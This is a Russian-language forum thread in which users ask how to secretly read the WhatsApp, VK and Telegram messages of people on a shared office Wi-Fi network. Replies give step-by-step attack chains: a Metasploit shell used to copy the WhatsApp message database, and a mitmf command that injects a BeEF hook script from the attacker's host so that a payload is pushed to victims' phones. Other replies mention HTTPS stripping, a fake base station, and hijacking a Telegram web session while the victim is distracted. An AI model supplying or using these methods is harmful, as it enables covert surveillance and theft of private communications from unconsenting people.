Доступ к телефонам через офисный вайфай

Discussion in 'Песочница' started by chucha, 29 Jun 2019.

  1. chucha

    chucha New Member

    Joined:
    28 Jun 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Расскажите чайнику, реально ли получить доступ к телефонам, переписке в Вотсап, подключенным к офисному вайфай? Много программ в интернет. Не скачиваются, не работают, и т.д.
     
  2. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,426
    Reputations:
    377
    1.Ставшь на комп Метасплойт например.
    2. Получаешь по средствам MS шел на телефоне жертвы.
    3. Утаскиваешь из папки: sdcard/WhatsApp/Databases файл msgstore.db - там вся переписка.
    4. ???
    5. Profit.
     
    _________________________
  3. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,426
    Reputations:
    377
    P.S.
    Перехват переписки Wpatsapp по средствам MiTM в сети WiFi не возжен , ибо шифрование.
     
    _________________________
    quite gray and Spinus like this.
  4. chucha

    chucha New Member

    Joined:
    28 Jun 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Для чайника непонятно)) компом пользоваться не буду. Своим телефоном . Так это не реально?
    А взлом Вк с такими же исходными данными, подключением к одному вайфай тоже не реален?
     
  5. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,426
    Reputations:
    377
    Для чайников есть 100500 видео на ютубе.
    Метасплойт при желании можно и на смартфоне/планшете поднять.
    По ВК раньше можно было MiTM реализовать , сейчас все в ssl заворачиваетя вроде.
     
    _________________________
  6. chucha

    chucha New Member

    Joined:
    28 Jun 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Чушь собачья на Ютубе. Есть некий sniffer
    Но он не устанавливается
     
  7. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,426
    Reputations:
    377
    Нажатием одной кнопки в одной программе по вашей теме сломать точно ничего не получится :rolleyes:
     
    _________________________
    nynenado and Coost like this.
  8. Darmanking

    Darmanking New Member

    Joined:
    18 Sep 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    можно установить термукс на андроид.в нем установить метасплоит и в локальной сети сможешь угонять все что тебе угодно. митм атаки,сниффинг и тп доступны 24/7 в локалках.(кроме айфонов)
     
  9. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Где-то года 2 назад читал, что имея доступ к роутеру можно настроить перенаправление всеx пользователей на http протокол в обход https, вот только на практике проверить все руки не доходили. Раньше вк был доступен по http, если вбить вручную адрес.
     
  10. Coost

    Coost Active Member

    Joined:
    6 Jul 2017
    Messages:
    221
    Likes Received:
    263
    Reputations:
    5
    Ещё есть интерсептор, но под него тоже нужен експлойт, чтобы вытащить данные. И вообще с ведроидом как он взаимодействует - вопрос
     
  11. HASARD

    HASARD New Member

    Joined:
    27 Feb 2019
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Viber переписку возможно получить такими методами ?
     
  12. irainbow

    irainbow New Member

    Joined:
    20 Dec 2019
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Добрый день, прошу помощи новичку, если не трудно в данном вопросе. Также изучаю тему получения доступа к файловой системе Андроидов и в поиске по форуму наткнулся на здешнее сообщение, где предлагается использовать Метасплоит и получение по средствам MS шела на соответствующем телефоне, и возник вопрос, как можно установить пейлоад на целевое устройство, созданный msfvenom без вот такого явного участия собственника телефона (т.е. без явного привлечения методов социальной инженерии, или же как это сделать незаметно) в той же Wifi сети. Есть ли иной способ проникнуть на телефон?
     
  13. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    300
    Likes Received:
    45
    Reputations:
    24
    1. Подними сервер beef
    2. Подними с помощью msf какой то пассивный сплойт(под мобильные устройства), или можешь поднять несколько, и далее редиректить их с одного сервера(msf) на другой(если один не сработал то на другой итд)
    3. Запусти mitmf.py -i wlan0--inject --spoof --js-url http://beef:3000/hook.js и жди...
    4. Как только увидишь что подцепил браузер запускай кидай юзеру событие в браузер по клику на которое он будет перенаправлен на твои сервера msf.

    ps: Надеюсь что сам ход мысли понятен, реализовать желаемое можно многими способами, в теории можно заглушить 3g/4g и на osmocom поднять свою BTS и переподключить все девайсы к ней, и далее уже с помощью соц. инженерии(и не только) пытаться реализовать задуманное.
     
    irainbow and user100 like this.
  14. irainbow

    irainbow New Member

    Joined:
    20 Dec 2019
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Спасибо, а можете пояснить плез как сервера с msf развернуть, гуглил msf server, но похоже не корректно задаю вопрос. Или надо в лоб все делать т.е. для примера перенаправлять, когда юзер нажал на beef-событие из браузера, на мой апач сервис, где у меня грубо говоря написано для примера "Hello World, скачайте payload" со ссылкой на апк файл для скачивания?
    Эти пункты очень интересуют:oops:
     
  15. jeanslend

    jeanslend Member

    Joined:
    14 Sep 2018
    Messages:
    23
    Likes Received:
    6
    Reputations:
    0
    Есть вообще вероятность прочитать переписку в чужом Telegram?
     
  16. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    300
    Likes Received:
    45
    Reputations:
    24
    Ответ на эти пункты должен включать полное объяснение как пользоваться данными инструментами. Наберите в гугле просто 'metasploit how to hack browser' и я вам даю гарантию в 99% что там будет информация.

    юзер кликнул на красивое окошло которое у него всплыло, и автоматом отправился на ваш msf сервер, в результате чего в него был загружен и выполнен payload(какой уже решать вам) и вы получили на своей стороне сессию. Далее эту схему уже можно автоматизировать и улучшать....
     
  17. Saruman023

    Saruman023 New Member

    Joined:
    15 Jan 2020
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    я делал так, отвлекал жертву чтоб она была занята далеко от телефона, с ее номера заходил в веб версию телеги, подтверждал вход с ее телефона, смс с подтвержденями удалял, вуаля - есть доступ
     
  18. DM_i

    DM_i New Member

    Joined:
    17 Jan 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Без доступа к гаджету это ничего не получится
     
Loading...